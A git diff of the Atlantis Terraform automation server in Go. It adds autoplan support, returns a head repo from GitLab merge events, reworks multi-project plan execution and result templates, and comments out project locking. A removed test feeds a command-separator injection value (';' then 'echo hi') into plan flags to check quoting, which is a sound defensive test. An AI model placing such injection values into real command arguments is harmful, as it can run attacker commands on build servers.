a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -42,10 +42,13 @@ type Command struct { Name CommandName Verbose bool Workspace string + // Autoplan is true if the command is a plan command being executed in an + // attempt to automatically run plan. + Autoplan bool } // NewCommand constructs a Command, setting all missing fields to defaults. -func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string) *Command { +func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command { // If dir was an empty string, this will return '.'. validDir := path.Clean(dir) if validDir == "/" { @@ -60,14 +63,17 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work Name: name, Verbose: verbose, Workspace: workspace, + Autoplan: autoplan, } } type EventParsing interface { ParseGithubIssueCommentEvent(comment *github.IssueCommentEvent) (baseRepo models.Repo, user models.User, pullNum int, err error) + // ParseGithubPull returns the pull request and head repo. ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) - ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error) + // ParseGitlabMergeEvent returns the pull request, base repo and head repo. + ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) ParseGitlabMergeCommentEvent(event gitlab.MergeCommentEvent) (baseRepo models.Repo, headRepo models.Repo, user models.User, err error) ParseGitlabMergeRequest(mr *gitlab.MergeRequest, baseRepo models.Repo) models.PullRequest } @@ -154,7 +160,7 @@ func (e *EventParser) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, e return models.NewRepo(models.Github, ghRepo.GetFullName(), ghRepo.GetCloneURL(), e.GithubUser, e.GithubToken) } -func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error) { +func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) { modelState := models.Closed if event.ObjectAttributes.State == gitlabPullOpened { modelState = models.Open @@ -162,7 +168,15 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul // GitLab also has a "merged" state, but we map that to Closed so we don't // need to check for it. - repo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken) + baseRepo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken) + if err != nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, err + } + headRepo, err := models.NewRepo(models.Gitlab, event.ObjectAttributes.Source.PathWithNamespace, event.ObjectAttributes.Source.GitHTTPURL, e.GitlabUser, e.GitlabToken) + if err != nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, err + } + pull := models.PullRequest{ URL: event.ObjectAttributes.URL, Author: event.User.Username, @@ -170,10 +184,10 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul HeadCommit: event.ObjectAttributes.LastCommit.ID, Branch: event.ObjectAttributes.SourceBranch, State: modelState, - BaseRepo: repo, + BaseRepo: baseRepo, } - return pull, repo, err + return pull, baseRepo, headRepo, err } // ParseGitlabMergeCommentEvent creates Atlantis models out of a GitLab event. diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go index dbd4b515e4..2e9b7e4346 100644 --- a/server/events/event_parser_test.go +++ b/server/events/event_parser_test.go @@ -156,7 +156,7 @@ func TestParseGitlabMergeEvent(t *testing.T) { var event *gitlab.MergeEvent err := json.Unmarshal([]byte(mergeEventJSON), &event) Ok(t, err) - pull, repo, err := parser.ParseGitlabMergeEvent(*event) + pull, repo, _, err := parser.ParseGitlabMergeEvent(*event) Ok(t, err) expRepo := models.Repo{ @@ -185,7 +185,7 @@ func TestParseGitlabMergeEvent(t *testing.T) { t.Log("If the state is closed, should set field correctly.") event.ObjectAttributes.State = "closed" - pull, _, err = parser.ParseGitlabMergeEvent(*event) + pull, _, _, err = parser.ParseGitlabMergeEvent(*event) Ok(t, err) Equals(t, models.Closed, pull.State) } @@ -283,19 +283,19 @@ func TestNewCommand_CleansDir(t *testing.T) { for _, c := range cases { t.Run(c.Dir, func(t *testing.T) { - cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace") + cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", false) Equals(t, c.ExpDir, cmd.Dir) }) } } func TestNewCommand_EmptyWorkspace(t *testing.T) { - cmd := events.NewCommand("dir", nil, events.Plan, false, "") + cmd := events.NewCommand("dir", nil, events.Plan, false, "", false) Equals(t, "default", cmd.Workspace) } func TestNewCommand_AllFieldsSet(t *testing.T) { - cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace") + cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", false) Equals(t, events.Command{ Workspace: "workspace", Dir: "dir", diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go index eee10f5890..e6e928c24b 100644 --- a/server/events/execution_planner.go +++ b/server/events/execution_planner.go @@ -1,4 +1,4 @@ -package runtime +package events import ( "fmt" @@ -6,7 +6,8 @@ import ( "path/filepath" "github.com/hashicorp/go-version" - "github.com/runatlantis/atlantis/server/events" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" ) @@ -19,25 +20,27 @@ type ExecutionPlanner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version ParserValidator *yaml.ParserValidator - ProjectFinder events.ProjectFinder + ProjectFinder ProjectFinder } type TerraformExec interface { RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) } -func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (PlanStage, error) { +func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (runtime.PlanStage, error) { defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) if err != nil { - return nil, err + return runtime.PlanStage{}, err } - return &PlanStage{ - Steps: steps, + return runtime.PlanStage{ + Steps: steps, + Workspace: workspace, + ProjectPath: relProjectPath, }, nil } -func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]PlanStage, error) { +func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]runtime.PlanStage, error) { // If there is an atlantis.yaml // -> Get modified files from pull request. // -> For each project, if autoplan == true && files match @@ -54,21 +57,23 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu // was modified in the pull request. if os.IsNotExist(err) { projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir) - var stages []PlanStage + var stages []runtime.PlanStage for _, p := range projects { // NOTE: we use the default workspace because we don't know about // other workspaces. If users want to plan for other workspaces they // need to use a config file. - steps := s.defaultPlanSteps(log, repoDir, defaultWorkspace, p.Path, nil, username) - stages = append(stages, PlanStage{ - Steps: steps, + steps := s.defaultPlanSteps(log, repoDir, models.DefaultWorkspace, p.Path, nil, username) + stages = append(stages, runtime.PlanStage{ + Steps: steps, + Workspace: models.DefaultWorkspace, + ProjectPath: p.Path, }) } return stages, nil } // Else we run plan according to the config file. - var stages []PlanStage + var stages []runtime.PlanStage for _, p := range config.Projects { if s.shouldAutoplan(p.AutoPlan, modifiedFiles) { // todo @@ -79,25 +84,25 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu } func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool { - + return true } func (s *ExecutionPlanner) getSteps() { } -func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { +func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*runtime.ApplyStage, error) { defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) if err != nil { return nil, err } - return &ApplyStage{ + return &runtime.ApplyStage{ Steps: steps, }, nil } -func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) { +func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []runtime.Step) ([]runtime.Step, error) { config, err := s.ParserValidator.ReadConfig(repoDir) // If there's no config file, use defaults. @@ -129,7 +134,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // We have a workflow defined, so now we need to build it. meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - var steps []Step + var steps []runtime.Step var stepsConfig []yaml.StepConfig if stageName == PlanStageName { stepsConfig = workflow.Plan.Steps @@ -137,25 +142,25 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge stepsConfig = workflow.Apply.Steps } for _, stepConfig := range stepsConfig { - var step Step + var step runtime.Step switch stepConfig.StepType { case "init": - step = &InitStep{ + step = &runtime.InitStep{ Meta: meta, ExtraArgs: stepConfig.ExtraArgs, } case "plan": - step = &PlanStep{ + step = &runtime.PlanStep{ Meta: meta, ExtraArgs: stepConfig.ExtraArgs, } case "apply": - step = &ApplyStep{ + step = &runtime.ApplyStep{ Meta: meta, ExtraArgs: stepConfig.ExtraArgs, } case "run": - step = &RunStep{ + step = &runtime.RunStep{ Meta: meta, Commands: stepConfig.Run, } @@ -170,8 +175,8 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge return defaults, nil } -func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) StepMeta { - return StepMeta{ +func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) runtime.StepMeta { + return runtime.StepMeta{ Log: log, Workspace: workspace, AbsolutePath: filepath.Join(repoDir, relProjectPath), @@ -184,23 +189,23 @@ func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, } } -func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step { +func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step { meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - return []Step{ - &InitStep{ + return []runtime.Step{ + &runtime.InitStep{ ExtraArgs: nil, Meta: meta, }, - &PlanStep{ + &runtime.PlanStep{ ExtraArgs: nil, Meta: meta, }, } } -func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step { +func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step { meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - return []Step{ - &ApplyStep{ + return []runtime.Step{ + &runtime.ApplyStep{ ExtraArgs: nil, Meta: meta, }, diff --git a/server/events/execution_planner_test.go b/server/events/execution_planner_test.go index 9c3fd5ac4d..7b6fc7ac97 100644 --- a/server/events/execution_planner_test.go +++ b/server/events/execution_planner_test.go @@ -1,4 +1,4 @@ -package runtime_test +package events_test import ( "io/ioutil" @@ -6,6 +6,7 @@ import ( "testing" "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" @@ -15,7 +16,7 @@ import ( func TestBuildStage_NoConfigFile(t *testing.T) { var defaultTFVersion *version.Version var terraformExecutor runtime.TerraformExec - e := runtime.ExecutionPlanner{ + e := events.ExecutionPlanner{ DefaultTFVersion: defaultTFVersion, TerraformExecutor: terraformExecutor, } @@ -50,7 +51,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) { Meta: meta, }, }, - }, *planStage) + }, planStage) }) // Then the apply stage. @@ -70,7 +71,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) { func TestBuildStage(t *testing.T) { var defaultTFVersion *version.Version var terraformExecutor runtime.TerraformExec - e := runtime.ExecutionPlanner{ + e := events.ExecutionPlanner{ DefaultTFVersion: defaultTFVersion, TerraformExecutor: terraformExecutor, } @@ -131,7 +132,7 @@ workflows: Meta: meta, }, }, - }, *planStage) + }, planStage) }) t.Run("apply stage for project without config", func(t *testing.T) { @@ -171,7 +172,7 @@ workflows: Commands: []string{"echo", "hi"}, }, }, - }, *planStage) + }, planStage) }) t.Run("apply stage for custom config", func(t *testing.T) { diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index 978cc7776a..f91a45a1f1 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -18,6 +18,8 @@ import ( "fmt" "strings" "text/template" + + "github.com/Masterminds/sprig" ) // MarkdownRenderer renders responses as markdown. @@ -44,10 +46,16 @@ type FailureData struct { // ResultData is data about a successful response. type ResultData struct { - Results map[string]string + Results []ProjectResultTmplData CommonData } +type ProjectResultTmplData struct { + Workspace string + Dir string + Rendered string +} + // Render formats the data into a markdown string. // nolint: interfacer func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool) string { @@ -63,10 +71,15 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log } func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, common CommonData) string { - results := make(map[string]string) + var resultsTmplData []ProjectResultTmplData + for _, result := range pathResults { + resultData := ProjectResultTmplData{ + Workspace: result.Workspace, + Dir: result.Path, + } if result.Error != nil { - results[result.Path] = m.renderTemplate(errTmpl, struct { + resultData.Rendered = m.renderTemplate(errTmpl, struct { Command string Error string }{ @@ -74,7 +87,7 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com Error: result.Error.Error(), }) } else if result.Failure != "" { - results[result.Path] = m.renderTemplate(failureTmpl, struct { + resultData.Rendered = m.renderTemplate(failureTmpl, struct { Command string Failure string }{ @@ -82,21 +95,22 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com Failure: result.Failure, }) } else if result.PlanSuccess != nil { - results[result.Path] = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess) + resultData.Rendered = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess) } else if result.ApplySuccess != "" { - results[result.Path] = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess}) + resultData.Rendered = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess}) } else { - results[result.Path] = "Found no template. This is a bug!" + resultData.Rendered = "Found no template. This is a bug!" } + resultsTmplData = append(resultsTmplData, resultData) } var tmpl *template.Template - if len(results) == 1 { + if len(resultsTmplData) == 1 { tmpl = singleProjectTmpl } else { tmpl = multiProjectTmpl } - return m.renderTemplate(tmpl, ResultData{results, common}) + return m.renderTemplate(tmpl, ResultData{resultsTmplData, common}) } func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interface{}) string { @@ -107,15 +121,15 @@ func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interfac return buf.String() } -var singleProjectTmpl = template.Must(template.New("").Parse("{{ range $result := .Results }}{{$result}}{{end}}\n" + logTmpl)) -var multiProjectTmpl = template.Must(template.New("").Parse( - "Ran {{.Command}} in {{ len .Results }} directories:\n" + - "{{ range $path, $result := .Results }}" + - " * `{{$path}}`\n" + +var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index .Results 0}}Ran {{.Command}} in dir: `{{$result.Dir}}` workspace: `{{$result.Workspace}}`\n{{$result.Rendered}}\n" + logTmpl)) +var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse( + "Ran {{.Command}} for {{ len .Results }} projects:\n" + + "{{ range $result := .Results }}" + + "1. path: `{{$result.Dir}} workspace: `{{$result.Workspace}}`\n" + "{{end}}\n" + - "{{ range $path, $result := .Results }}" + - "## {{$path}}/\n" + - "{{$result}}\n" + + "{{ range $i, $result := .Results }}" + + "### {{add $i 1}}. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" + + "{{$result.Rendered}}\n" + "---\n{{end}}" + logTmpl)) var planSuccessTmpl = template.Must(template.New("").Parse( diff --git a/server/events/mocks/mock_event_parsing.go b/server/events/mocks/mock_event_parsing.go index e88b581dce..007f823a40 100644 --- a/server/events/mocks/mock_event_parsing.go +++ b/server/events/mocks/mock_event_parsing.go @@ -80,12 +80,13 @@ func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models return ret0, ret1 } -func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, error) { +func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) { params := []pegomock.Param{event} - result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) var ret0 models.PullRequest var ret1 models.Repo - var ret2 error + var ret2 models.Repo + var ret3 error if len(result) != 0 { if result[0] != nil { ret0 = result[0].(models.PullRequest) @@ -94,10 +95,13 @@ func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) ret1 = result[1].(models.Repo) } if result[2] != nil { - ret2 = result[2].(error) + ret2 = result[2].(models.Repo) + } + if result[3] != nil { + ret3 = result[3].(error) } } - return ret0, ret1, ret2 + return ret0, ret1, ret2, ret3 } func (mock *MockEventParsing) ParseGitlabMergeCommentEvent(event go_gitlab.MergeCommentEvent) (models.Repo, models.Repo, models.User, error) { diff --git a/server/events/models/models.go b/server/events/models/models.go index 7344fd28e2..1d8d72453f 100644 --- a/server/events/models/models.go +++ b/server/events/models/models.go @@ -26,6 +26,10 @@ import ( "github.com/pkg/errors" ) +// DefaultWorkspace is the default Terraform workspace for both Atlantis and +// Terraform. +const DefaultWorkspace = "default" + // Repo is a VCS repository. type Repo struct { // FullName is the owner and repo name separated @@ -123,6 +127,7 @@ const ( ) // User is a VCS user. +// During an autoplan, the user will be the Atlantis API user. type User struct { Username string } diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index 7e92917551..4dd221422f 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -16,8 +16,8 @@ package events import ( "fmt" + "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/locking" - "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" @@ -39,7 +39,7 @@ type PlanExecutor struct { Workspace AtlantisWorkspace ProjectFinder ProjectFinder ProjectLocker ProjectLocker - ExecutionPlanner *runtime.ExecutionPlanner + ExecutionPlanner *ExecutionPlanner LockURLGenerator LockURLGenerator } @@ -56,32 +56,54 @@ func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse { return CommandResponse{Error: err} } - stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) - if err != nil { - return CommandResponse{Error: err} + var stages []runtime.PlanStage + if ctx.Command.Autoplan { + modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) + if err != nil { + return CommandResponse{Error: errors.Wrap(err, "getting modified files")} + } + stages, err = p.ExecutionPlanner.BuildAutoplanStages(ctx.Log, ctx.BaseRepo.FullName, cloneDir, ctx.User.Username, modifiedFiles) + if err != nil { + return CommandResponse{Error: err} + } + } else { + stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) + if err != nil { + return CommandResponse{Error: err} + } + stages = append(stages, stage) } - tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) - if err != nil { - return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} - } - if !tryLockResponse.LockAcquired { - return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} - } + var projectResults []ProjectResult + for _, stage := range stages { + projectResult := ProjectResult{ + Path: stage.ProjectPath, + Workspace: stage.Workspace, + } - out, err := stage.Run() - if err != nil { - // Plan failed so unlock the state. - if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil { - ctx.Log.Err("error unlocking state after plan error: %s", unlockErr) + // todo: this should be moved into the plan stage + //tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) + //if err != nil { + // return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} + //} + //if !tryLockResponse.LockAcquired { + // return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} + //} + // todo: endtodo + + out, err := stage.Run() + if err != nil { + //if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil { + // ctx.Log.Err("error unlocking state after plan error: %s", unlockErr) + //} + projectResult.Error = fmt.Errorf("%s\n%s", err.Error(), out) + } else { + projectResult.PlanSuccess = &PlanSuccess{ + TerraformOutput: out, + //LockURL: p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey), + } } - return CommandResponse{ProjectResults: []ProjectResult{{Error: fmt.Errorf("%s\n%s", err.Error(), out)}}} + projectResults = append(projectResults, projectResult) } - - return CommandResponse{ProjectResults: []ProjectResult{{ - PlanSuccess: &PlanSuccess{ - TerraformOutput: out, - LockURL: p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey), - }, - }}} + return CommandResponse{ProjectResults: projectResults} } diff --git a/server/events/plan_executor_test.go b/server/events/plan_executor_test.go index c9a209fe64..371aa9ec5c 100644 --- a/server/events/plan_executor_test.go +++ b/server/events/plan_executor_test.go @@ -13,276 +13,277 @@ // package events_test -import ( - "errors" - "testing" - - "github.com/mohae/deepcopy" - . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events" - "github.com/runatlantis/atlantis/server/events/locking" - lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks" - "github.com/runatlantis/atlantis/server/events/mocks" - "github.com/runatlantis/atlantis/server/events/models" - rmocks "github.com/runatlantis/atlantis/server/events/run/mocks" - tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks" - vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" - "github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers" - "github.com/runatlantis/atlantis/server/logging" - . "github.com/runatlantis/atlantis/testing" -) - -var planCtx = events.CommandContext{ - Command: &events.Command{ - Name: events.Plan, - Workspace: "workspace", - Dir: "", - }, - Log: logging.NewNoopLogger(), - BaseRepo: models.Repo{}, - HeadRepo: models.Repo{}, - Pull: models.PullRequest{}, - User: models.User{ - Username: "anubhavmishra", - }, -} - -func TestExecute_ModifiedFilesErr(t *testing.T) { - t.Log("If GetModifiedFiles returns an error we return an error") - p, _, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err")) - r := p.Execute(&planCtx) - - Assert(t, r.Error != nil, "exp .Error to be set") - Equals(t, "getting modified files: err", r.Error.Error()) -} - -func TestExecute_NoModifiedProjects(t *testing.T) { - t.Log("If there are no modified projects we return a failure") - p, _, _ := setupPlanExecutorTest(t) - // We don't need to actually mock VCSClient.GetModifiedFiles because by - // default it will return an empty slice which is what we want for this test. - r := p.Execute(&planCtx) - - Equals(t, "No Terraform files were modified.", r.Failure) -} - -func TestExecute_CloneErr(t *testing.T) { - t.Log("If AtlantisWorkspace.Clone returns an error we return an error") - p, _, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err")) - r := p.Execute(&planCtx) - - Assert(t, r.Error != nil, "exp .Error to be set") - Equals(t, "err", r.Error.Error()) -} - -func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) { - t.Log("Test that we run plan in the right directory and workspace if they're set") - p, runner, _ := setupPlanExecutorTest(t) - ctx := deepcopy.Copy(planCtx).(events.CommandContext) - ctx.Log = logging.NewNoopLogger() - ctx.Command.Dir = "dir1/dir2" - ctx.Command.Workspace = "workspace-flag" - - When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")). - ThenReturn("/tmp/clone-repo", nil) - When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})). - ThenReturn(events.PreExecuteResult{ - LockResponse: locking.TryLockResponse{ - LockKey: "key", - }, - }) - r := p.Execute(&ctx) - - runner.VerifyWasCalledOnce().RunCommandWithVersion( - ctx.Log, - "/tmp/clone-repo/dir1/dir2", - []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"}, - nil, - "workspace-flag", - ) - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") - Equals(t, "", result.PlanSuccess.TerraformOutput) - Equals(t, "lockurl-key", result.PlanSuccess.LockURL) -} - -func TestExecute_AddedArgs(t *testing.T) { - t.Log("Test that we include extra-args added to the comment in the plan command") - p, runner, _ := setupPlanExecutorTest(t) - ctx := deepcopy.Copy(planCtx).(events.CommandContext) - ctx.Log = logging.NewNoopLogger() - ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""} - - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). - ThenReturn(events.PreExecuteResult{ - LockResponse: locking.TryLockResponse{ - LockKey: "key", - }, - }) - r := p.Execute(&ctx) - - runner.VerifyWasCalledOnce().RunCommandWithVersion( - ctx.Log, - "/tmp/clone-repo", - []string{ - "plan", - "-refresh", - "-no-color", - "-out", - "/tmp/clone-repo/workspace.tfplan", - "-var", - "atlantis_user=anubhavmishra", - // NOTE: extra args should be quoted to prevent an attacker from - // appending malicious commands. - "\"-target=resource\"", - "\"-var\"", - "\"a=b\"", - "\";\"", - "\"echo\"", - "\"hi\"", - }, - nil, - "workspace", - ) - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") - Equals(t, "", result.PlanSuccess.TerraformOutput) - Equals(t, "lockurl-key", result.PlanSuccess.LockURL) -} - -func TestExecute_Success(t *testing.T) { - t.Log("If there are no errors, the plan should be returned") - p, runner, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). - ThenReturn(events.PreExecuteResult{ - LockResponse: locking.TryLockResponse{ - LockKey: "key", - }, - }) - - r := p.Execute(&planCtx) - - runner.VerifyWasCalledOnce().RunCommandWithVersion( - planCtx.Log, - "/tmp/clone-repo", - []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"}, - nil, - "workspace", - ) - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") - Equals(t, "", 